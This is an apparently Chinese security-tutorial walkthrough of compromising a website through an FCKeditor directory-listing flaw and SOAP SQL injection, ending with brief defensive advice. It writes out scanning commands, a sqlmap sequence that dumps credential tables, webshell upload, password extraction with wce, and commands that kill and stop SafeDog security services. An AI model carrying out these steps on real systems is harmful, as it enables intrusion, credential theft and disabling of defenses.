6.5 FCKeditor漏洞实战逐步渗透某站点
6.5.1 目标信息搜集与扫描
(1) IP地址
ping www.xxx.com
nslookup www.xxx.com
(2) 端口扫描
masscan -p 1-65535 212.22.22.33
(3) 漏洞扫描
使用AWVS进行扫描
(4) 同网段域名查询
使用https://www.webscan.cc/进行同网段查询
通过上述整理的IP网段使用nmap进行IP地址范围的扫描
nmap -p 1-65535 -T4 -A -v xx.xx.xx.50-80
(5) 获取真实路径信息
这里作者是通过页面出错获取网站的真实路径
6.5.2 FCKeditor编辑器利用
(1) 查看磁盘文件列表
(2) 下载源代码文件
(3) 获取sms配置文件
(4) 上传webshell
6.5.3 SOAP服务注入漏洞
1. SOAP服务漏洞扫描
这里使用AWVS的Web Service Scanner进行扫描即可,最新版可以直接使用扫描模块进行扫描
2. 头文件抓包并保存
(1) SQL注入漏洞-web.keb.asmx
(2) SQL注入漏洞-micromall.asmx
3. 使用sqlmap进行注入测试
将上述抓到的请求包保存文件为sopabmfx1.txt soapbmfx2.txt,然后使用sqlmap -r参数读文件进行注入
(1) sqlmap.py -r soapbmfx1.txt --batch
(2) sqlmap.py -r soapbmfx1.txt --batch --current-db
(3) sqlmap.py -r soapbmfx1.txt --batch --current-user
(4) sqlmap.py -r soapbmfx1.txt --batch --is-dba
(5) sqlmap.py -r soapbmfx1.txt --batch --uesrs
(6) sqlmap.py -r soapbmfx1.txt --batch --passwords
(7) sqlmap.py -r soapbmfx1.txt --batch --dbs
上面的命令也可以一气呵成
sqlmap.py -r soapbmfx1.txt --batch --current-db --current-user --is-dba --users --passwords --dbs --exclude-sysdbs
(8) sqlmap.py -r soapbmfx1.txt --batch -D keb --tables --time-sec=15 --delay=5
(9) sqlmap.py -r soapbmfx1.txt --batch -D keb -T dbo.ma --columns
(10) sqlmap.py -r soapbmfx1.txt --batch -D keb -T dbo.ma -C "email,username,paswd" --dump
或者
(11) sqlmap.py -r soapbmfx1.txt --batch -D keb -T dbo.ma --dump
4. 登录后台地址
(1) 找到后台地址并登录
(2) 修改管理员密码及收集验证号码
(3) 登录后台管理
5. 获取webshell
(1) 上传地址
(2) 上传shell抓包并修改
(3) 获取webshell
(4) 使用菜刀连接
(5) 上传大马
6. 延伸渗透
(1) 收集目标存在的asmx文件
收集目标存在的asmx文件
(2) 加url地址进行实际访问测试
6.5.4 服务器权限及密码获取
1. 获取当前用户权限
通过webshell选择cmdshell,执行命令whoami看是否是最高权限
2. 获取服务器密码
使用wce获取密码
3. 登录服务器
(1) 服务器远程端口获取
tasklist /svc | find "TermService" 这里获取pid号
netstat -ano | find "3388" 根据pid号获取开放的端口
(2) 登录服务器
使用mstsc进行登录
4. 常规提权思路
(1) 生成系统信息文件
systeminfo > win.txt
(2) 进行漏洞对比
使用Windows-exploit-suggester.py
6.5.5 安全对抗
1. 安全防护软件
(1) 阻止安全狗及其他防范软件
pskill SafeDogTray.exe
......
对应此工具的文档,这是一个工具套件,还有其他的工具,非常强大
https://docs.microsoft.com/en-us/sysinternals/downloads/pskill
第一次通过命令行使用需要加/accepteula
(2) 停止SafeDog相关服务
net stop "SafeDogGuardCenter"
net stop "Safedog Update Center" /y
net stop "SafeDogCloudHelper" /y
2. 代理转发
(1) 使用EW进行代理转发,并且配置Proxifier
这里我前面的章节详细讲过,并且演示过
6.5.6 数据库导出
1. 数据库密码及账号整理
2. 站库分离
数据库服务器和Web服务器不在同一台计算机上,就是大家常说的站库分离
3. 通过允许CCProxy代理程序进入该网络
http://www.ccproxy.com/manual.htm
4. 配置Proxifier
5. 连接数据库
6.5.7 渗透总结与防御
1. 渗透总结
(1) 整个目标相对难于渗透,在渗透中一个低级的漏洞在合适的条件下可以转化为高危漏洞
(2) SOAP注入是本次能够成功的前提,通过FCKeditor编辑器列目录漏洞,成功获取了网站的源码及相关代码文件
(3) 对SOAP服务进行wdsl漏洞扫描
(4) 使用sqlmap对SOAP注入进行测试
(5) 使用代理穿透服务查看和管理数据库
2. 安全防御
(1) 使用FCKeditor最新版本
(2) 设置图片上传目录仅可读,不可执行
(3) 去除多余的无用无关文件
(4) 网站根目录不留代码备份文件
(5) 对SOAP程序加强过滤,加强SQL注入防御
参考:https://blog.51cto.com/simeon/2117821#